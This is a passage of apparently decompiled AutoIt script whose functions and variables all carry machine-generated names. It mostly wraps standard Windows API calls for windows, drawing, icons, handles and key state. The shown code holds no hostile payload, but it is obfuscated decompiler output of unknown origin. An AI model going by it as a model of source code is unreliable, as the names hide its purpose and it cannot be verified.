  455. Func Fn001D($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
  456. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateRoundRectRgn","int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05)
  457. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  458. RETURN $Local000E [ 0 ]
  459. ENDFUNC
  460.  
  461. Func Fn001E($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=1)
  462. LOCAL $Local0013 =Fn004E($Arg00)
  463. LOCAL $Local0014 =Fn0015($Local0013 )
  464. LOCAL $Local0015 =Fn0014($Local0013 ,$Arg02,$Arg03)
  465. LOCAL $Local0016 =Fn00A5($Local0014 ,$Local0015 )
  466. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  467. DLLSTRUCTSETDATA($Local0017 , 1 , 0 )
  468. DLLSTRUCTSETDATA($Local0017 , 2 , 0 )
  469. DLLSTRUCTSETDATA($Local0017 , 3 ,$Arg02)
  470. DLLSTRUCTSETDATA($Local0017 , 4 ,$Arg03)
  471. IF $ArgOpt04 THEN
  472. $Arg01=BITOR(BITAND($Arg01,0xFF00 ),BITSHIFT(BITAND($Arg01,0x00FF ),-0x0010 ),BITSHIFT(BITAND($Arg01,0x00FF0000 ),0x0010 ))
  473. ENDIF
  474. LOCAL $Local0018 =Fn001F($Arg01)
  475. Fn0038($Local0014 ,$Local0017 ,$Local0018 )
  476. IF @ERROR THEN
  477. Fn0023($Local0015 )
  478. $Local0015 = 0
  479. ENDIF
  480. Fn0023($Local0018 )
  481. Fn00A3($Arg00,$Local0013 )
  482. Fn00A5($Local0014 ,$Local0016 )
  483. Fn0022($Local0014 )
  484. IF NOT $Local0015 THEN RETURN SETERROR( 1 , 0 , 0 )
  485. RETURN $Local0015
  486. ENDFUNC
  487.  
  488. Func Fn001F($Arg00)
  489. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateSolidBrush","dword" ,$Arg00)
  490. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  491. RETURN $Local000E [ 0 ]
  492. ENDFUNC
  493.  
  494. Func Fn0020($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08,$ArgOpt09=0,$ArgOpt0A=0,$ArgOpt0B=0)
  495. IF $ArgOpt0A= 0 THEN $ArgOpt0A=Fn005B("")
  496. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"CreateWindowExW","dword" ,$Arg00,"wstr" ,$Arg01,"wstr" ,$Arg02,"dword" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05,"int" ,$Arg06,"int" ,$Arg07,"hwnd" ,$Arg08,"handle" ,$ArgOpt09,"handle" ,$ArgOpt0A,"ptr" ,$ArgOpt0B)
  497. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  498. RETURN $Local000E [ 0 ]
  499. ENDFUNC
  500.  
  501. Func Fn0021($Arg00,$Arg01,$Arg02,$Arg03)
  502. LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"DefWindowProc","hwnd" ,$Arg00,"uint" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
  503. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  504. RETURN $Local000E [ 0 ]
  505. ENDFUNC
  506.  
  507. Func Fn0022($Arg00)
  508. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"DeleteDC" ,"handle" ,$Arg00)
  509. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  510. RETURN $Local000E [ 0 ]
  511. ENDFUNC
  512.  
  513. Func Fn0023($Arg00)
  514. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"DeleteObject","handle" ,$Arg00)
  515. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  516. RETURN $Local000E [ 0 ]
  517. ENDFUNC
  518.  
  519. Func Fn0024($Arg00)
  520. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DestroyIcon","handle" ,$Arg00)
  521. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  522. RETURN $Local000E [ 0 ]
  523. ENDFUNC
  524.  
  525. Func Fn0025($Arg00)
  526. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DestroyWindow","hwnd" ,$Arg00)
  527. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  528. RETURN $Local000E [ 0 ]
  529. ENDFUNC
  530.  
  531. Func Fn0026($Arg00,$Arg01,$Arg02,$Arg03)
  532. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawEdge" ,"handle" ,$Arg00,"ptr" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03)
  533. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  534. RETURN $Local000E [ 0 ]
  535. ENDFUNC
  536.  
  537. Func Fn0027($Arg00,$Arg01,$Arg02,$Arg03)
  538. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawFrameControl","handle" ,$Arg00,"ptr" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03)
  539. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  540. RETURN $Local000E [ 0 ]
  541. ENDFUNC
  542.  
  543. Func Fn0028($Arg00,$Arg01,$Arg02,$Arg03)
  544. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawIcon" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"handle" ,$Arg03)
  545. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  546. RETURN $Local000E [ 0 ]
  547. ENDFUNC
  548.  
  549. Func Fn0029($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=0,$ArgOpt05=0,$ArgOpt06=0,$ArgOpt07=0,$ArgOpt08=3)
  550. LOCAL $Var013D
  551. SWITCH $ArgOpt08
  552. CASE 1
  553. $Var013D =$Var004D
  554. CASE 2
  555. $Var013D =$Var004F
  556. CASE 3
  557. $Var013D =$Var0051
  558. CASE 4
  559. $Var013D =$Var0053
  560. CASE 5
  561. $Var013D =$Var0055
  562. CASE ELSE
  563. $Var013D =$Var0057
  564. ENDSWITCH
  565. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawIconEx","handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"handle" ,$Arg03,"int" ,$ArgOpt04,"int" ,$ArgOpt05,"uint" ,$ArgOpt06,"handle" ,$ArgOpt07,"uint" ,$Var013D )
  566. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  567. RETURN $Local000E [ 0 ]
  568. ENDFUNC
  569.  
  570. Func Fn002A($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
  571. Fn0091($Arg00,$Arg01,$Arg02)
  572. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  573. Fn0081($Arg00,$Arg03,$Arg04)
  574. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  575. RETURN TRUE
  576. ENDFUNC
  577.  
  578. Func Fn002B($Arg00,$Arg01,BYREF $ArgRef02,$Arg03)
  579. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"DrawTextW" ,"handle" ,$Arg00,"wstr" ,$Arg01,"int" ,- 1 ,"struct*" ,$ArgRef02,"uint" ,$Arg03)
  580. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  581. RETURN $Local000E [ 0 ]
  582. ENDFUNC
  583.  
  584. Func Fn002C($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
  585. LOCAL $Local0000 =DLLCALL("kernel32.dll","bool" ,"DuplicateHandle","handle" ,$Arg00,"handle" ,$Arg01,"handle" ,$Arg02,"handle*" , 0 ,"dword" ,$Arg03,"bool" ,$Arg04,"dword" ,$Arg05)
  586. IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
  587. RETURN $Local0000 [ 4 ]
  588. ENDFUNC
  589.  
  590. Func Fn002D($Arg00,$ArgOpt01=TRUE )
  591. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"EnableWindow","hwnd" ,$Arg00,"bool" ,$ArgOpt01)
  592. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  593. RETURN $Local000E [ 0 ]
  594. ENDFUNC
  595.  
  596. Func Fn002E($Arg00,$Arg01)
  597. LOCAL $Local0019 = 0 ,$Local00AB = 0 ,$Var013E [ 5 ]
  598. IF $Arg00<>"" THEN
  599. $Local0019 =DLLSTRUCTCREATE("wchar Text["&STRINGLEN($Arg00)+ 1 &"]" )
  600. DLLSTRUCTSETDATA($Local0019 ,"Text" ,$Arg00)
  601. ENDIF
  602. LOCAL $Local001A =DLLSTRUCTCREATE($Var010F )
  603. LOCAL $Local001B =DLLSTRUCTGETSIZE($Local001A )
  604. DLLSTRUCTSETDATA($Local001A ,"Size" ,$Local001B )
  605. DLLCALL("user32.dll","bool" ,"EnumDisplayDevicesW","struct*" ,$Local0019 ,"dword" ,$Arg01,"struct*" ,$Local001A ,"dword" , 1 )
  606. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  607. LOCAL $Local001C =DLLSTRUCTGETDATA($Local001A ,"Flags" )
  608. IF BITAND($Local001C ,$Var0059 )<> 0 THEN $Local00AB =BITOR($Local00AB , 1 )
  609. IF BITAND($Local001C ,$Var005B )<> 0 THEN $Local00AB =BITOR($Local00AB , 2 )
  610. IF BITAND($Local001C ,$Var005D )<> 0 THEN $Local00AB =BITOR($Local00AB , 4 )
  611. IF BITAND($Local001C ,$Var005F )<> 0 THEN $Local00AB =BITOR($Local00AB , 8 )
  612. IF BITAND($Local001C ,$Var0061 )<> 0 THEN $Local00AB =BITOR($Local00AB ,0x0010 )
  613. IF BITAND($Local001C ,$Var0063 )<> 0 THEN $Local00AB =BITOR($Local00AB ,0x0020 )
  614. $Var013E [ 0 ]=TRUE
  615. $Var013E [ 1 ]=DLLSTRUCTGETDATA($Local001A ,"Name" )
  616. $Var013E [ 2 ]=DLLSTRUCTGETDATA($Local001A ,"String" )
  617. $Var013E [ 3 ]=$Local00AB
  618. $Var013E [ 4 ]=DLLSTRUCTGETDATA($Local001A ,"ID" )
  619. RETURN $Var013E
  620. ENDFUNC
  621.  
  622. Func Fn002F($ArgOpt00=TRUE ,$ArgOpt01=DEFAULT )
  623. Fn0032()
  624. IF $ArgOpt01=DEFAULT THEN $ArgOpt01=Fn004F()
  625. Fn0031($ArgOpt01,$ArgOpt00)
  626. RETURN $Var0022
  627. ENDFUNC
  628.  
  629. Func Fn0030($Arg00,$ArgOpt01="")
  630. IF $ArgOpt01="" THEN $ArgOpt01=Fn0045($Arg00)
  631. $Var0022 [ 0 ][ 0 ]+= 1
  632. LOCAL $Local001D =$Var0022 [ 0 ][ 0 ]
  633. IF $Local001D >=$Var0022 [ 0 ][ 1 ]THEN
  634. REDIM $Var0022 [$Local001D +0x0040 ][ 2 ]
  635. $Var0022 [ 0 ][ 1 ]+=0x0040
  636. ENDIF
  637. $Var0022 [$Local001D ][ 0 ]=$Arg00
  638. $Var0022 [$Local001D ][ 1 ]=$ArgOpt01
  639. ENDFUNC
  640.  
  641. Func Fn0031($Arg00,$ArgOpt01=TRUE )
  642. $Arg00=Fn006C($Arg00,$Var004B )
  643. WHILE $Arg00<> 0
  644. IF (NOT $ArgOpt01)OR Fn007F($Arg00)THEN
  645. Fn0031($Arg00,$ArgOpt01)
  646. Fn0030($Arg00)
  647. ENDIF
  648. $Arg00=Fn006C($Arg00,$Var0049 )
  649. WEND
  650. ENDFUNC
  651.  
  652. Func Fn0032()
  653. REDIM $Var0022 [0x0040 ][ 2 ]
  654. $Var0022 [ 0 ][ 0 ]= 0
  655. $Var0022 [ 0 ][ 1 ]=0x0040
  656. ENDFUNC
  657.  
  658. Func Fn0033()
  659. Fn0032()
  660. LOCAL $Local001E =Fn006C(Fn004F(),$Var004B )
  661. LOCAL $Var013F
  662. WHILE $Local001E <> 0
  663. IF Fn007F($Local001E )THEN
  664. $Var013F =Fn0045($Local001E )
  665. IF $Var013F ="#32768" THEN
  666. Fn0030($Local001E )
  667. ELSEIF $Var013F ="ToolbarWindow32" THEN
  668. Fn0030($Local001E )
  669. ELSEIF $Var013F ="ToolTips_Class32" THEN
  670. Fn0030($Local001E )
  671. ELSEIF $Var013F ="BaseBar" THEN
  672. Fn0031($Local001E )
  673. ENDIF
  674. ENDIF
  675. $Local001E =Fn006C($Local001E ,$Var0049 )
  676. WEND
  677. RETURN $Var0022
  678. ENDFUNC
  679.  
  680. Func Fn0034()
  681. Fn0032()
  682. LOCAL $Local001E =Fn006C(Fn004F(),$Var004B )
  683. WHILE $Local001E <> 0
  684. IF Fn007F($Local001E )THEN Fn0030($Local001E )
  685. $Local001E =Fn006C($Local001E ,$Var0049 )
  686. WEND
  687. RETURN $Var0022
  688. ENDFUNC
  689.  
  690. Func Fn0035($Arg00)
  691. LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"ExpandEnvironmentStringsW","wstr" ,$Arg00,"wstr" ,"","dword" ,0x1000 )
  692. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  693. RETURN $Local000E [ 2 ]
  694. ENDFUNC
  695.  
  696. Func Fn0036($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
  697. LOCAL $Local000E =DLLCALL("shell32.dll","uint" ,"ExtractIconExW","wstr" ,$Arg00,"int" ,$Arg01,"struct*" ,$Arg02,"struct*" ,$Arg03,"uint" ,$Arg04)
  698. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  699. RETURN $Local000E [ 0 ]
  700. ENDFUNC
  701.  
  702. Func Fn0037($Arg00)
  703. DLLCALL("kernel32.dll","none" ,"FatalAppExitW","uint" , 0 ,"wstr" ,$Arg00)
  704. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
  705. ENDFUNC
  706.  
  707. Func Fn0038($Arg00,$Arg01,$Arg02)
  708. LOCAL $Local000E
  709. IF ISPTR($Arg02)THEN
  710. $Local000E =DLLCALL("user32.dll","int" ,"FillRect" ,"handle" ,$Arg00,"struct*" ,$Arg01,"handle" ,$Arg02)
  711. ELSE
  712. $Local000E =DLLCALL("user32.dll","int" ,"FillRect" ,"handle" ,$Arg00,"struct*" ,$Arg01,"dword_ptr" ,$Arg02)
  713. ENDIF
  714. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  715. RETURN $Local000E [ 0 ]
  716. ENDFUNC
  717.  
  718. Func Fn0039($Arg00,$ArgOpt01="")
  719. LOCAL $Local000E =DLLCALL("shell32.dll","INT" ,"FindExecutableW","wstr" ,$Arg00,"wstr" ,$ArgOpt01,"wstr" ,"")
  720. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  721. RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 3 ])
  722. ENDFUNC
  723.  
  724. Func Fn003A($Arg00,$Arg01)
  725. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"FindWindowW","wstr" ,$Arg00,"wstr" ,$Arg01)
  726. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  727. RETURN $Local000E [ 0 ]
  728. ENDFUNC
  729.  
  730. Func Fn003B($Arg00,$ArgOpt01=TRUE )
  731. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"FlashWindow","hwnd" ,$Arg00,"bool" ,$ArgOpt01)
  732. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  733. RETURN $Local000E [ 0 ]
  734. ENDFUNC
  735.  
  736. Func Fn003C($Arg00,$ArgOpt01=3,$ArgOpt02=3,$ArgOpt03=0)
  737. LOCAL $Local001F =DLLSTRUCTCREATE($Var0111 )
  738. LOCAL $Local0020 =DLLSTRUCTGETSIZE($Local001F )
  739. LOCAL $Local0021 = 0
  740. IF BITAND($ArgOpt01, 1 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0041 )
  741. IF BITAND($ArgOpt01, 2 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0043 )
  742. IF BITAND($ArgOpt01, 4 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0045 )
  743. IF BITAND($ArgOpt01, 8 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0047 )
  744. DLLSTRUCTSETDATA($Local001F ,"Size" ,$Local0020 )
  745. DLLSTRUCTSETDATA($Local001F ,"hWnd" ,$Arg00)
  746. DLLSTRUCTSETDATA($Local001F ,"Flags" ,$Local0021 )
  747. DLLSTRUCTSETDATA($Local001F ,"Count" ,$ArgOpt02)
  748. DLLSTRUCTSETDATA($Local001F ,"Timeout" ,$ArgOpt03)
  749. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"FlashWindowEx","struct*" ,$Local001F )
  750. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  751. RETURN $Local000E [ 0 ]
  752. ENDFUNC
  753.  
  754. Func Fn003D($Arg00)
  755. LOCAL $Local0022 =DLLSTRUCTCREATE("float" )
  756. LOCAL $Local0023 =DLLSTRUCTCREATE("int" ,DLLSTRUCTGETPTR($Local0022 ))
  757. DLLSTRUCTSETDATA($Local0022 , 1 ,$Arg00)
  758. RETURN DLLSTRUCTGETDATA($Local0023 , 1 )
  759. ENDFUNC
  760.  
  761. Func Fn003E($Arg00)
  762. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"FlushFileBuffers","handle" ,$Arg00)
  763. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  764. RETURN $Local000E [ 0 ]
  765. ENDFUNC
  766.  
  767. Func Fn003F($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04,$Arg05,$Arg06)
  768. LOCAL $Local0024 ="struct*"
  769. IF ISSTRING($ArgRef04)THEN $Local0024 ="wstr"
  770. LOCAL $Local000E =DLLCALL("Kernel32.dll","dword" ,"FormatMessageW","dword" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword" ,$Arg03,$Local0024 ,$ArgRef04,"dword" ,$Arg05,"ptr" ,$Arg06)
  771. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  772. IF $Local0024 ="wstr" THEN $ArgRef04=$Local000E [ 5 ]
  773. RETURN $Local000E [ 0 ]
  774. ENDFUNC
  775.  
  776. Func Fn0040($Arg00,$Arg01,$Arg02)
  777. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"FrameRect" ,"handle" ,$Arg00,"ptr" ,$Arg01,"handle" ,$Arg02)
  778. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  779. RETURN $Local000E [ 0 ]
  780. ENDFUNC
  781.  
  782. Func Fn0041($Arg00)
  783. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"FreeLibrary","handle" ,$Arg00)
  784. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  785. RETURN $Local000E [ 0 ]
  786. ENDFUNC
  787.  
  788. Func Fn0042($Arg00,$ArgOpt01=1)
  789. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetAncestor","hwnd" ,$Arg00,"uint" ,$ArgOpt01)
  790. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  791. RETURN $Local000E [ 0 ]
  792. ENDFUNC
  793.  
  794. Func Fn0043($Arg00)
  795. LOCAL $Local000E =DLLCALL("user32.dll","short" ,"GetAsyncKeyState","int" ,$Arg00)
  796. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  797. RETURN $Local000E [ 0 ]
  798. ENDFUNC
  799.  
  800. Func Fn0044($Arg00)
  801. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetBkMode" ,"handle" ,$Arg00)
  802. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  803. RETURN $Local000E [ 0 ]
  804. ENDFUNC
  805.  
  806. Func Fn0045($Arg00)
  807. IF NOT ISHWND($Arg00)THEN $Arg00=GUICTRLGETHANDLE($Arg00)
  808. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetClassNameW","hwnd" ,$Arg00,"wstr" ,"","int" ,0x1000 )
  809. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  810. RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
  811. ENDFUNC
  812.  
  813. Func Fn0046($Arg00)
  814. LOCAL $Local0017 =Fn0048($Arg00)
  815. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  816. RETURN DLLSTRUCTGETDATA($Local0017 ,"Bottom" )-DLLSTRUCTGETDATA($Local0017 ,"Top" )
  817. ENDFUNC
  818.  
  819. Func Fn0047($Arg00)
  820. LOCAL $Local0017 =Fn0048($Arg00)
  821. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  822. RETURN DLLSTRUCTGETDATA($Local0017 ,"Right" )-DLLSTRUCTGETDATA($Local0017 ,"Left" )
  823. ENDFUNC
  824.  
  825. Func Fn0048($Arg00)
  826. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  827. DLLCALL("user32.dll","bool" ,"GetClientRect","hwnd" ,$Arg00,"struct*" ,$Local0017 )
  828. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  829. RETURN $Local0017
  830. ENDFUNC
  831.  
  832. Func Fn0049()
  833. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetCurrentProcess")
  834. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  835. RETURN $Local000E [ 0 ]
  836. ENDFUNC
  837.  
  838. Func Fn004A()
  839. LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"GetCurrentProcessId")
  840. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  841. RETURN $Local000E [ 0 ]
  842. ENDFUNC
  843.  
  844. Func Fn004B()
  845. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetCurrentThread")
  846. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  847. RETURN $Local000E [ 0 ]
  848. ENDFUNC
  849.  
  850. Func Fn004C()
  851. LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"GetCurrentThreadId")
  852. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  853. RETURN $Local000E [ 0 ]
  854. ENDFUNC
  855.  
  856. Func Fn004D()
  857. LOCAL $Local0025 =DLLSTRUCTCREATE($Var010C )
  858. LOCAL $Local0026 =DLLSTRUCTGETSIZE($Local0025 )
  859. DLLSTRUCTSETDATA($Local0025 ,"Size" ,$Local0026 )
  860. DLLCALL("user32.dll","bool" ,"GetCursorInfo","struct*" ,$Local0025 )
  861. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  862. LOCAL $Local0027 [ 5 ]
  863. $Local0027 [ 0 ]=TRUE
  864. $Local0027 [ 1 ]=DLLSTRUCTGETDATA($Local0025 ,"Flags" )<> 0
  865. $Local0027 [ 2 ]=DLLSTRUCTGETDATA($Local0025 ,"hCursor" )
  866. $Local0027 [ 3 ]=DLLSTRUCTGETDATA($Local0025 ,"X" )
  867. $Local0027 [ 4 ]=DLLSTRUCTGETDATA($Local0025 ,"Y" )
  868. RETURN $Local0027
  869. ENDFUNC
  870.  
  871. Func Fn004E($Arg00)
  872. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetDC" ,"hwnd" ,$Arg00)
  873. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  874. RETURN $Local000E [ 0 ]
  875. ENDFUNC
  876.  
  877. Func Fn004F()
  878. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetDesktopWindow")
  879. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  880. RETURN $Local000E [ 0 ]
  881. ENDFUNC
  882.  
  883. Func Fn0050($Arg00,$Arg01)
  884. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetDeviceCaps","handle" ,$Arg00,"int" ,$Arg01)
  885. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  886. RETURN $Local000E [ 0 ]
  887. ENDFUNC
  888.  
  889. Func Fn0051($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06)
  890. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetDIBits" ,"handle" ,$Arg00,"handle" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03,"ptr" ,$Arg04,"ptr" ,$Arg05,"uint" ,$Arg06)
  891. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  892. RETURN $Local000E [ 0 ]
  893. ENDFUNC
  894.  
  895. Func Fn0052($Arg00)
  896. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetDlgCtrlID","hwnd" ,$Arg00)
  897. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  898. RETURN $Local000E [ 0 ]
  899. ENDFUNC
  900.  
  901. Func Fn0053($Arg00,$Arg01)
  902. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetDlgItem","hwnd" ,$Arg00,"int" ,$Arg01)
  903. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  904. RETURN $Local000E [ 0 ]
  905. ENDFUNC
  906.  
  907. Func Fn0054()
  908. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetFocus" )
  909. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  910. RETURN $Local000E [ 0 ]
  911. ENDFUNC
  912.  
  913. Func Fn0055()
  914. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetForegroundWindow")
  915. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  916. RETURN $Local000E [ 0 ]
  917. ENDFUNC
  918.  
  919. Func Fn0056($ArgOpt00=0,$ArgOpt01=-1)
  920. IF $ArgOpt01=- 1 THEN $ArgOpt01=Fn0049()
  921. LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetGuiResources","handle" ,$ArgOpt01,"dword" ,$ArgOpt00)
  922. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  923. RETURN $Local000E [ 0 ]
  924. ENDFUNC
  925.  
  926. Func Fn0057($Arg00)
  927. LOCAL $Local0028 =DLLSTRUCTCREATE($Var0113 )
  928. DLLCALL("user32.dll","bool" ,"GetIconInfo","handle" ,$Arg00,"struct*" ,$Local0028 )
  929. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  930. LOCAL $Local0029 [ 6 ]
  931. $Local0029 [ 0 ]=TRUE
  932. $Local0029 [ 1 ]=DLLSTRUCTGETDATA($Local0028 ,"Icon" )<> 0
  933. $Local0029 [ 2 ]=DLLSTRUCTGETDATA($Local0028 ,"XHotSpot" )
  934. $Local0029 [ 3 ]=DLLSTRUCTGETDATA($Local0028 ,"YHotSpot" )
  935. $Local0029 [ 4 ]=DLLSTRUCTGETDATA($Local0028 ,"hMask" )
  936. $Local0029 [ 5 ]=DLLSTRUCTGETDATA($Local0028 ,"hColor" )
  937. RETURN $Local0029
  938. ENDFUNC
  939.  
  940. Func Fn0058($Arg00)
  941. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetFileSizeEx","handle" ,$Arg00,"int64*" , 0 )
  942. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  943. RETURN $Local000E [ 2 ]
  944. ENDFUNC
  945.  
  946. Func Fn0059()
  947. LOCAL $Local002A =DLLSTRUCTCREATE("ptr" )
  948. LOCAL $Local002B =Fn003F(BITOR($Var0033 ,$Var0035 ), 0 ,A1000604D34(), 0 ,$Local002A , 0 , 0 )
  949. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  950. LOCAL $Local002C =""
  951. LOCAL $Local002D =DLLSTRUCTGETDATA($Local002A , 1 )
  952. IF $Local002D THEN
  953. IF $Local002B > 0 THEN
  954. LOCAL $Local000C =DLLSTRUCTCREATE("wchar[" &($Local002B + 1 )&"]" ,$Local002D )
  955. $Local002C =DLLSTRUCTGETDATA($Local000C , 1 )
  956. ENDIF
  957. Fn0088($Local002D )
  958. ENDIF
  959. RETURN $Local002C
  960. ENDFUNC
  961.  
  962. Func Fn005A($Arg00,BYREF $ArgRef01,BYREF $ArgRef02,$ArgOpt03=FALSE )
  963. $ArgRef01=- 1
  964. $ArgRef02=- 1
  965. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"GetLayeredWindowAttributes","hwnd" ,$Arg00,"dword*" ,$ArgRef01,"byte*" ,$ArgRef02,"dword*" , 0 )
  966. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  967. IF NOT $ArgOpt03 THEN
  968. $Local000E [ 2 ]=INT(BINARYMID($Local000E [ 2 ], 3 , 1 )&BINARYMID($Local000E [ 2 ], 2 , 1 )&BINARYMID($Local000E [ 2 ], 1 , 1 ))
  969. ENDIF
